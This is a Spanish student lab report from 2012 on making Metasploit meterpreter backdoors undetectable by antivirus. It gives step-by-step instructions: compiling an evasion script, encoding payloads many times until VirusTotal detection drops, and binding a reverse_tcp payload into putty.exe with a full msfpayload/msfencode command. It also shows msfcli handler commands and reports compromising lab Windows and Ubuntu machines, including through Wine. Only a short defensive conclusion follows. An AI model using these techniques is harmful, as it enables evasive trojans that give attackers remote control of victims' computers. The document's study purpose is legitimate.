3m-exploit indetectable con metasploit

METASPLOIT PRACTICA 4 MALWARE INDETECTABLE

CONTRA ANTIVIRUS Y SISTEMAS

2012

Javier García Cambronel SEGUNDO DE ASIR

25/01/2012

[METASPLOIT] 25 de enero de 2012

SEGUNDO DE ASIR Página 1

INTRODUCCION

EQUIPOS DE PRUEBAS

CREANDO UN EXPLOIT INDETECTABLE

CÓDIGO EXPLOIT

CAMBIO EN EL EXPLOIT PARA QUE FUNCIONE

COMPILACION DEL EXPLOIT

PREGUNTAS DEL EXPLOIT

PROCESO DE COMPILACIÓN

NO ES ORO TODO LO QUE RELUCE TODAVIA QUEDA TRABAJO

MÁS MODIFICACIONES EN NUESTRO CÓDIGO DEL EXPLOIT

TODO TRABAJO TIENE SU RECOMPENSA

EJECUCION DE LOS ATAQUES

EXPLOIT WINDOWS XP SP2

EXPLOIT EN WINDOWS XP SP3 CON AVAST

EXPLOIT EN WINDOWS 7 64BITS SP1 CON NOD32

EXPLOIT EN UBUNTU 11.04

CAMUFLANDO EXPLOIT EN UN PROGRAMA

WINDOWS 7 32BITS SP1

LINUX SE PUEDE INFECTAR DE VIRUS A TRAVÉS DE WINE

CONCLUSIONES

REFERENCIAS (WEBGRAFÍA)



INTRODUCCION

¿QUE ES UN ANTIVIRUS?

Es un programa creado para prevenir o evitar la activación de los virus, así como su

propagación y contagio. Cuenta además con rutinas de detención, eliminación y

reconstrucción de los archivos y las áreas infectadas del sistema.

Un antivirus tiene tres principales funciones y componentes:

VACUNA es un programa que instalado residente en la memoria, actúa

como "filtro" de los programas que son ejecutados, abiertos para ser leídos o

copiados, en tiempo real.

DETECTOR, que es el programa que examina todos los archivos existentes en el disco

o a los que se les indique en una determinada ruta o PATH. Tiene instrucciones

de control y reconocimiento exacto de los códigos virales que permiten capturar sus

pares, debidamente registrados y en forma sumamente rápida desarman su

estructura.

ELIMINADOR es el programa que una vez desactivada la estructura del virus procede

a eliminarlo e inmediatamente después a reparar o reconstruir los archivos y áreas

afectadas.

Es importante aclarar que todo antivirus es un programa y que, como todo programa, sólo

funcionará correctamente si es adecuado y está bien configurado. Además, un antivirus es

una herramienta para el usuario y no sólo no será eficaz para el 100% de los casos, sino que

nunca será una protección total ni definitiva.



EQUIPOS DE PRUEBAS

EQUIPO VICTIMA WINDOWS XP SP2

La dirección IP de nuestro equipo victima1 será la que vemos en la imagen 192.168.1.35

PROTECCIÓN NOD 32 5.9.5 ACTUALIZADO 29/01/2012

ESET NOD32 AntiVirus es un antivirus de calidad

y eficacia realmente impresionantes, con una

certeza prácticamente absoluta de que en cada

una de sus versiones detectará

cualquier virus conocido y, mediante una

heurística compleja, por conocer.

En conjunto ESET NOD32 AntiVirus es un

antivirus de primera calidad, compitiendo entre

los mejores en la mayoría de las facetas de estos indispensables de los usuarios, aunque en

la velocidad y la total detección basa toda su potencia, destacando del resto.

Esta versión de ESET NOD32 AntiVirus se adapta a las últimas tendencias en lo que

a interfaz gráfica se refiere. La nueva interfaz, aunque en inglés, es fácil de usar a más no

poder, y cuenta con dos modos: normal y avanzado.

Heurística avanzada

Análisis muy rápidos

Consumo de memoria reducido

Protección mediante contraseña

Exportación de la configuración

Inspector de sistema y actividad



EQUIPO VICTIMA WINDOWS XP SP3

La dirección IP de nuestro equipo victima será la que vemos en la imagen 192.168.1.36

PROTECCION AVAST 6.0.1367 ACTUALIZADO 29/01/2012

Las novedades de la versión 6 La sexta edición de avast!

Free Antivirus presenta pocos cambios estéticos en

comparación con la anterior, pero amplía aún más el

abanico de la protección gratuita.

A los escudos de la versión 5 se añaden los de scripts y

comportamiento. Y con el módulo AutoSandbox, avast!

Free Antivirus impide que programas potencialmente

dañinos puedan afectar el sistema.La gran novedad de

avast! Free Antivirus 6 es WebRep, el complemento para Firefox, Chrome e Internet Explorer

que comprueba la reputación de una página a partir de las valoraciones de los usuarios.

Tres barras coloreadas indican la calidad del sitio y hay recuadros para clasificar el sitio web

en distintas categorías. Es un sistema eficaz y abierto a las contribuciones de los usuarios.

Lo cierto es que ningún antivirus gratuito ofrece tanto como avast! Free Antivirus. Traducido

y apoyado por una inmensa comunidad de usuarios, se postula como el antivirus gratuito

por excelencia.

Ocho escudos de protección en tiempo real

Defensa proactiva con el escudo conductual

Sandbox para ejecutar software sospechoso

Módulo de reputación web



PROTECCION 2 IOBIT MALWARE

IObit Malware Fighter protege el ordenador frente a

programas espía, troyanos, adware y otros tipos de

software maligno que suele atacar el sistema a través de

páginas web, correos y descargas.

La tarjeta de presentación de IObit Malware Fighter es

impecable: una ventana elegante, un consumo de

memoria contenido y ocho escudos de protección en

tiempo real. Por si no bastara, IObit ha añadido DOG, una nariz electrónica capaz de

encontrar malware desconocido a partir de varios criterios.

¿Es todo oro lo que reluce? En nuestras pruebas, IObit Malware Fighter ha sido eficaz y

rápido, detectando amenazas al instante y guardando los archivos en cuarentena; a veces,

en las redes de IObit Malware Fighter ha caído incluso publicidad normal y corriente.

Si te quedaran dudas acerca de la peligrosidad de un archivo, IObit Malware Fighter puede

subirlo a IObit Cloud, su servicio de análisis "en la Nube". Es un buen añadido para este

antiespías eficaz y ligero.

Protección en tiempo real rápida y eficaz

Detección de amenazas desconocidas

Envío de archivos sospechosos a IObit Cloud

Excelente diseño de interfaz



EQUIPO VICTIMA WINDOWS 7 PROFESSIONAL 32BITS


PROTECCION KASPERSKY INTERNET SECURITY 2012 ACTUALIZADO 29/01/2012

Kaspersky Internet Security 2012 brinda una protección superior contra

virus, troyanos, spam, hackers y otros. Su foco en la seguridad digital,

que incluye sistemas híbridos de última generación, combina

innovadoras tecnologías “en la nube” con una avanzada protección

antivirus para garantizar una respuesta más rápida y efectiva contra las

amenazas modernas que siempre están en constante desarrollo. Tú, al

igual que tus datos privados y tu PC, están bajo completa protección

cuando trabajas, realizas transacciones bancarias, compras online o juegas en Internet.



EQUIPO VICTIMA WINDOWS 7 PROFESSIONAL 64BITS


PROTECCIÓN NOD 32 5.9.5 ACTUALIZADO 29/01/2012

ESET NOD32 AntiVirus es un antivirus de calidad

y eficacia realmente impresionantes, con una

certeza prácticamente absoluta de que en cada

una de sus versiones detectará

cualquier virus conocido y, mediante una

heurística compleja, por conocer.

En conjunto ESET NOD32 AntiVirus es un

antivirus de primera calidad, compitiendo entre

los mejores en la mayoría de las facetas de estos indispensables de los usuarios, aunque en

la velocidad y la total detección basa toda su potencia, destacando del resto.

Esta versión de ESET NOD32 AntiVirus se adapta a las últimas tendencias en lo que

a interfaz gráfica se refiere. La nueva interfaz, aunque en inglés, es fácil de usar a más no

poder, y cuenta con dos modos: normal y avanzado.

Heurística avanzada

Análisis muy rápidos

Consumo de memoria reducido

Protección mediante contraseña

Exportación de la configuración

Inspector de sistema y actividad



EQUIPO VICTIMA UBUNTU 11.04 32BITS


SIN PROTECCION ANTIVIRUS



CREANDO UN EXPLOIT INDETECTABLE

Después de mucho buscar recogemos el código del exploit, para compilarlo nosotros mismos

no sin antes echarle un vistazo ante problemas que pudieran surgir y ver cómo podríamos

solucionarlos.

CÓDIGO EXPLOIT

Lo podemos descargar desde el siguiente enlace

http://pastebin.com/7xmvGnks

Hay que tener en cuenta que si lo dejamos tal como esta nos dará el siguiente error y el

archivo ejecutable que nos de. No servirá para nada

http://pastebin.com/7xmvGnks



CAMBIO EN EL EXPLOIT PARA QUE FUNCIONE

Si nos fijamos en el error que da si no modificamos nada del código como podemos ver en

diversos tutoriales como el siguiente.

http://www.flu-project.com/backdoor-indetectable-generado-con-metasploit.html

Es un error en la Validación de Lhost, o lo que es lo mismo, de nuestro ordenador, entonces

lo más normal, seria mirar el código y más concretamente la parte donde introducimos los

datos de nuestra IP

Antes estaba configurado así

Así nos quedaría después de hacer el cambio pertinente para que funcione el script, es decir,

haciendo que el script lea la dirección IP cuando la introducimos, La asigne el valor correcto a

la variable y no tengamos ningún problema.




Ahora lo siguiente que tenemos que hacer, es ejecutar el siguiente comando en nuestra

terminal para que podamos compilarlo correctamente, pues la verdad es un exploit muy

complejo, del cual ya veremos sus ventajas.

apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

COMPILACION DEL EXPLOIT

Bueno, ahora que estamos listos para compilarlo ya ya hemos echado un vistazo al código del

exploit, lo que hacemos será guardarlo lo guardamos con el nombre de vanish.sh que para

eso han sido los creadores.

Una vez creado y guardado, lo pegamos en la ruta donde se encuentran los exploits, y algunos

diréis ¿cuál es esa ruta? Pues depende desde donde estes ejecutando metasploit, yo lo estoy

ejecutando desde Backtrack aunque supongo que ya lo habíais adivinado con las capturas que

llevamos hasta aquí y encima para no conseguir nada de nada. Bueno sin más dilaciones la

ruta es la siguiente:

pentest/exploits/framework

Nos vamos a sistema de archivos después a la carpeta pentest, seguidamente a la carpeta

exploits y por último a la carpeta framework desde la line de comandos lo haríamos

situándonos donde está el archivo y con la opción move y la ruta que he dicho anteriormente.

Una vez que lo hemos copiado, nos situamos desde la terminal en la ruta donde esta nuestro

exploit

cd /pentest/exploits/framework

Y ejecutamos para darnos permisos

chmod + vanish.sh

y lo siguiente para ejecutar dicho script

sh vanish.sh



PREGUNTAS DEL EXPLOIT

Como podemos ver nos hace una serie de preguntas.

TARJETA DE RED: Detecta nuestras tarjetas de red, es decir, la interfaz y nosotros tendremos

que elegir la que tenemos activa, con nuestra ip, si dudamos de cual es abrir otro terminal y

escribir ifconfig.

PUERTO DE ESCUCHA: Entonces lo siguiente que nos preguntará es porque puerto queremos

hacer la conexión, nosotros escogemos el puerto 3222, para escoger un puerto ,lo mejor que

podemos hacer si dudamos, es escoger uno que ya este escuchando, para así no tener ningún

problema, esto se hace con el comando netstat –l, para ver los puertos que están escuchando

actualmente en nuestro equipo.

NÚMERO DE INICIALIZACIÓN ALEATORIO: Este número nos sirve a la hora de compilar el

exploit y va a indicar la forma y el tamaño en que se crea el script, haciendo un código

completamente único, Apuntar que cuanto más valor le demos al a este número más ocupará

el ejecutable que creemos.

NÚMERO DE VECES A CODIFICAR: Pasaremos ahora por los codificadores y seleccionamos, el

número de veces que pasaremos sobre estos, sobre un máximo de 20.

NUESTRA IP: Por último lo que tenemos que hacer es poner nuestra IP y esperar.



PROCESO DE COMPILACIÓN

Veremos, que cuando lo estamos creando y se está codificando nuestro ordenador puede

tardar un poco en responder, esto es porque para realizar este proceso, el uso de la CPU

llegará al 100% y se mantendrá hasta que termine la operación.

Como vemos se llevaran acabo las codificaciones indicadas y se ejecutara una vez creado

automáticamente.

Una vez terminada la aplicación veremos que se abre automáticamente una el payload con la

dirección IP de nuestro ordenador y el puerto donde está escuchando.



NO ES ORO TODO LO QUE RELUCE TODAVIA QUEDA TRABAJO

Una vez llegado este momento es donde nuestra víctima tendría que ejecutar el .exe que

hemos creado. ¿Dónde se encuentra este ejecutable? Se crea donde habíamos metido el

exploit para compilarlo, en una carpeta llamada seclabs.

MÁS MODIFICACIONES EN NUESTRO CÓDIGO DEL EXPLOIT

Habrá que realizar esta operación unas cuantas veces jugando con los valores de número de

inicialización aleatorio y tamaño y como no MODIFICAR EL EXPLOIT A MANO UN POQUITO

COMO EN ESTE CASO.

Nos desplazamos a la parte del exploit que se dedica a la codificación.

Introducimos más codificadores para hacer de nuestro código un código único



TODO TRABAJO TIENE SU RECOMPENSA

Después de Realizar una y otra vez los cambios pertinentes citados en el caso anterior vamos

comprobando subiendo a virustotal el resultado final.

Vemos como cambiando los valores tanto de inicialización como de tamaño… el hash del

virus, cambia lo suficiente como para ser detectado por muchos menos

Cambiando un poco el código y volviéndolo un poco más sencillo volvemos a mejorar los

resultados.



Hasta que damos con uno lo suficientemente “BUENO” cercano a la PERFECCION.

EJECUCION DE LOS ATAQUES

NUESTRA PRIMERA VICTIMA WINDOWS XP SP2

Como vemos en la siguiente ventana no se ha encontrado ningún virus es más directamente

es capaz de evitar el análisis si nos fijamos bien.



Podemos pulsar en mostrar el registro a petición del usuario y vemos los detalles.

Entonces ahora lo que hacemos es ejecutar el archivo malicioso, que para más INRI, tiene el

nombre de Backdoor.exe una vez ejecutado el archivo….

Vemos como hemos creado sesión en el equipo de la víctima, recordemos que este tiene

WINDOWS XP SP2 y el antivirus, completamente actualizado.



Siempre que quisiéramos esperar una respuesta de nuevo de esa puerta trasera,para una

nueva víctima o para esta misma siempre y cuando no hayamos migrado a un proceso de la

máquina vícitima, cosa que recomiendo una vez abierta la sesión de meterpreter.

Si no, ejecutaríamos el siguiente código y abriríamos de nuevo la sesión al abrir el archivo. Y

para ver que esto es así hacemos una captura de pantalla desde nuestra sesión de

meterpreter.

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp

LHOST=192.168.1.39 LPORT=3222 E



EXPLOIT EN WINDOWS XP SP3 CON AVAST

Como podemos ver, nuestro antivirus en este caso avast, se encuentra en su última versión y

completamente actualizado

Realizamos los análisis pertinentes y vemos que no detecta ninguna amenaza

Probamos con el Anti Malware instalado en el equipo y vemos que también nos dice que no

tiene ninguna amenaza.



Sin embargo vemos que al ejecutar el archivo y este no tener ningún certificado o al menos a

eso se lo achaco yo, nos dice que podría ser una aplicación potencialmente insegura

recomendándolo abrir en SANDBOX y nos avisa de que cualquier dato salvado se perderá al

cerrarlo. Bueno pues vamos a ver como es de seguro dicho SandBox.

Ejecutamos el archivo y como podemos ver hacemos una captura de pantalla en la que

podemos ver el equipo víctima y lo que esta haciendo en ese momento, lo realmente

importante no es esta captura de pantalla, sino que tendremos acceso total al ordenador.



EXPLOIT EN WINDOWS 7 64BITS SP1 CON NOD32

Como vemos hemos podido completamente con los dos Windows XP y los resultados que

nos ha arrojado el EXPLOIT analizándolo con VIRUSTOTAL son muy buenos.Lo que vamos a

hacer ahora es proceder con un sistema operativo WINDOWS7 con Service Pack1 instalado y

actualizado a 20-01-2012.

Volvemos a ejecutar el comando para que se cargue nuestro payload handler


LHOST=192.168.1.39 LPORT=3222 E

y se quede esperando la conexión, hasta que claro, alguien ejecute nuestro archivo, en este

caso ese alguien voy a ser yo desde mi equipo anfitrión.

Vemos que al introducirnos en el USB donde tenemos el archivo con el MALWARE no nos

dice nada el antivirus, entonces lo que vamos a hacer es doble click



Al ejecutarlo, vemos que se crea la sesión perfectamente y podríamos migrar a un proceso,

para tener una puerta trasera permanente a este equipo. Como vemos para ver que esto se

ha realizado correctamente hemos hecho una captura de pantalla desde METERPRETER con

el comando screenshot. Y en ella podemos ver hasta la propia ventana de la máquina virtual

donde hemos realizado el ataque y las otras en las que estamos realizando las pruebas.



EXPLOIT EN UBUNTU 11.04

En esta prueba, vamos a ver como la frase de que Linux

no tiene virus “cae por su propio peso”.

Lo primero que tenemos que tener en cuenta, para

realizar este ataque, es que Linux por defecto no es

capaz de ejecutar un archivo con extensión .exe

Entonces lo que vamos a tener que hacer es hacer dicho

exploit en otra extensión que si que reconozca Linux…. Y

sea capaz de ejecutarla sin ningún problema por

ejemplo la extensión .run

MODIFICANDO DE NUEVO NUESTRO EXPLOIT

Para hacer el exploit ejecutable en Linux tenemos que volver al código de nuestro exploit e

ir a la parte de compilación, para que la conversión se realice en vez de a un archivo.exe a

uno que sea .run

Nos tendría que quedar algo como la siguiente imagen.

Una vez guardados los cambios procedemos de nuevo a su compilación vista anteriormente

en este trabajo. Pulsa aquí para volver a revisar como llevar a cabo dicho proceso.

Una vez compilado podemos ver que resultados obtenemos en virus total, aunque en

realidad para esta prueba no tiene demasiada importancia, Pues nuestro Ubuntu no tiene

ningún antivirus instalado.

Para ver el informe completo de detección pinchar sobre el siguiente enlace

https://www.virustotal.com/file/b04588b64c7fc06cbf38898e6cc9e065e09d01d7d997ad59ec

a25a2b2669ace8/analysis/1328463333/

https://www.virustotal.com/file/b04588b64c7fc06cbf38898e6cc9e065e09d01d7d997ad59eca25a2b2669ace8/analysis/1328463333/

https://www.virustotal.com/file/b04588b64c7fc06cbf38898e6cc9e065e09d01d7d997ad59eca25a2b2669ace8/analysis/1328463333/



ATACANDO UBUNTU

Como nuestro exploit ya esta creado y camuflado en un RUN. Nos metemos en nuestra

máquina atacante (backtrack5) y ejecutamos el siguiente comando desde la consola


LHOST=192.168.1.39 LPORT=3222 E

Veremos algo como la siguiente imagen, esperando a que el archivo malicioso sea ejecutado

Nos vamos al archivo que hemos introducido mediante un USB

Vamos a sus propiedades y marcamos la opción que vemos en la pantalla para que nos

permita ejecutar el archivo con un doble click



Acto seguido ejecutamos el archivo, volvemos a la máquina atacante y como vemos la sesión

se ha creado perfectamente.

Una vez hemos tomado el control, podemos hacer lo que queramos en la víctima, aquí

hemos listado todos los archivos de la raíz de dicho sistema.



CAMUFLANDO EXPLOIT EN UN PROGRAMA

Despues de probar diversos JOINER con el que mejor resultados he obtenido es con el propio

de metasploit, eso si previamente hay que actualizar metasploit, pero ¿que son los joiner?

programas que son muy interesantes para infectar inadvertidamente a la víctima con virus y

troyanos. Un binder (también llamado Joiner o Juntador) es un programa que une dos o más

archivos. Estos archivos pueden ser ejecutables o de cualquier otro tipo dependiendo del

binder que usemos.

Hay ciertas normas que nunca se pueden violar en este tipo de uniones de archivos. Por

ejemplo, podemos unir un archivo *.exe a un archivo *.jpg. Esta unión es factible en binders

como el Juntador Beta, pero el resultado nunca podrá ser un archivo *.jpg.

Si bien un archivo de imagen podría ocultar un ejecutable en su interior, nunca podríamos

ejecutar el ejecutable al picar sobre la imagen.

Hay que tener en cuenta que antes de nada, (sé que lo he dicho antes, pero en realidad es

muy importante) tendremos que actualizar nuestro metasploit, para que todos los módulos

estén en la última versión y ejecutar un código más o menos como este donde las

codificaciones abunden tanto en calidad como en cantidad

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=3222 R |

msfencode -e x86/shikata_ga_nai -c 114 -t raw | msfencode -e x86/alpha_upper -c 25 -t raw

| msfencode –e x86/shikata_ga_nai -c 114 -t raw | msfencode -e x86/countdown -c 114 -t

exe -o /tmp/puttynuevo.exe -k -x /tmp/putty.exe -e x86/shikata_ga_nai -c 114

Después de ejecutar el anterior comando y de que nuestro programa se cree con la cantidad

de codificaciones que le hemos metido (las cuales tardarán un rato) lo subimos como ya

seguro os lo habéis aprendido a virustotal.

Y vemos que los resultados que nos arroja, si bien, no son perfectos…. No son nada malos

partiendo de la base de que de esos 10 motores de búsqueda pertenecen a Antivirus poco

conocidos y que los grandes como McAfee, Karpersky, Norton, Avast no los detectan.

De todas formas este ejecutable lo podríamos guardar y crear otro con el mismo exploit, que

no fuera detectado por algunos de estos 10 que lo detectan, y asi con dos o tres ejecutables

diferentes utilizando el dado para la ocasión saltarnos cualquier antivirus.



WINDOWS 7 32BITS SP1

He utilizado Kaspersky para esta prueba y en su versión más completa y actualizada por ser

considerado por muchos y por otra parte no les falta razón (debido a su heurística avanzada

entre otras cosas) como el mejor antivirus.

Bueno, al grano en estas pruebas no he repetido los pasos de nuevo por no excederme en

volver a reiterar las mismas, pero el equipo atacante está escuchando esperando a que el

archivo malicioso sea ejecutado.

Como vemos hemos analizado Puttynuevo.exe y no nos ha detectado ninguna amenaza.

Y como vemos también en la misma ventana hemos ejecutado el archivo malicioso y se nos

ha abierto el programa putty, pero claro….¿se habrá creado nuestra sesión?



Como podemos ver hemos hecho una captura de pantalla y en ella podemos ver en nuestro

navegador Firefox de nuestro backtrack la captura de pantalla que acabamos de realizar

sobre el equipo víctima.



LINUX SE PUEDE INFECTAR DE VIRUS A TRAVÉS DE WINE

El desarrollo del servicio de la capa de compatibilidad de aplicaciones

de Windows sobre Linux, Wine, ha avanzado tanto que ya es posible que

los programas que corran sobre Wine se infecten por un virus de

Windows, cosa que no sucederá con los programas del sistema

operativo GNU/Linux. Ya no estamos hablando de virus hacia un

sistema operativo, que también, si no directamente virus que afecten

a programas concretos y que gracias a ellos podamos tomar el control

de un sistema operativo diferente para el que fueron programados.

INSTALANDO WINE EN UBUNTU

Lo primero que debemos hacer es instalar “WINE” un programa que nos permite ejecutar

casi cualquier programa hecho para Windows lo hacemos, con el siguiente comando.

En el mismo proceso de instalación podemos ver la siguiente ventana en la que tendremos

que aceptar los términos de la licencia.

Aceptamos para proceder a la instalación

http://odstatic.com/ethek.com/Tux.svg.png

http://www.ethek.com/linux-se-puede-infectar-de-virus-a-traves-de-wine/



Y esperamos hasta que la instalación finaliza con éxito

Lo siguiente que debemos hacer es ejecutar el comando desde la terminal “winecfg” esperar

a que se lleven a cabo una serie de procesos y nos salga la ventana de configuración donde

podremos configurar, como el sistema operativo de Microsoft a emular y diferentes cosas,

nosotros lo dejamos como viene por defecto.

ATACANDO UBUNTU MEDIANTE WINE

Como nuestro exloit ya esta creado y camuflado en un EXE. Nos metemos en nuestra

máquina atacante (backtrack5) y ejecutamos el siguiente comando desde la consola


LHOST=192.168.1.39 LPORT=3222 E

Veremos algo como la siguiente imagen, esperando a que el archivo malicioso sea ejecutado



Con el botón derecho sobre el archivo le damos a abrir con Wine cargador de programas de

Windows

Como podemos ver, la sesión se crea perfectamente y si hacemos un SYSINFO nos dice que

esta corriendo un Windows XP SP3 Pues es el sistema operativo al que esta emulando Wine

También podemos hacer un ls para mirar los archivos de la raíz y como vemos tenemos

control completo de Linux.



Como podemos ver también en la siguiente imagen si hacemos un IPCONFIG dentro de

Merterpreter, nos da los mismos datos que tenemos con IFCONFIG desde el propio Linux,

tanto la dirección IP como la dirección MAC.



CONCLUSIONES

Las actualizaciones de Sistemas operativos y todo tipo de software como los antivirus… son

muy importantes. MANTENTE ACTUALIZADO.

Ninguna protección es definitiva, pero si se mejora algo nuestra seguridad.

Nunca debemos dar información del software instalado en nuestro equipo (sobretodo

antivirus)

Linux también es vulnerable y debido a que mucha gente piensa que no lo es, no tienen

software antivirus en su distribución (GRAN ERROR)

REFERENCIAS (WEBGRAFÍA)


http://thehackerway.com/2011/04/07/payloads-metasploit-framework/

http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass

http://vishnuvalentino.com/computer/hacking-windows-xp-sp3-via-ms11-006-windows-

shell-graphvulnerability/


http://thehackerway.com/2011/04/07/payloads-metasploit-framework/

http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass

http://vishnuvalentino.com/computer/hacking-windows-xp-sp3-via-ms11-006-windows-shell-graphvulnerability/

http://vishnuvalentino.com/computer/hacking-windows-xp-sp3-via-ms11-006-windows-shell-graphvulnerability/

3m-exploit indetectable con metasploit

Documents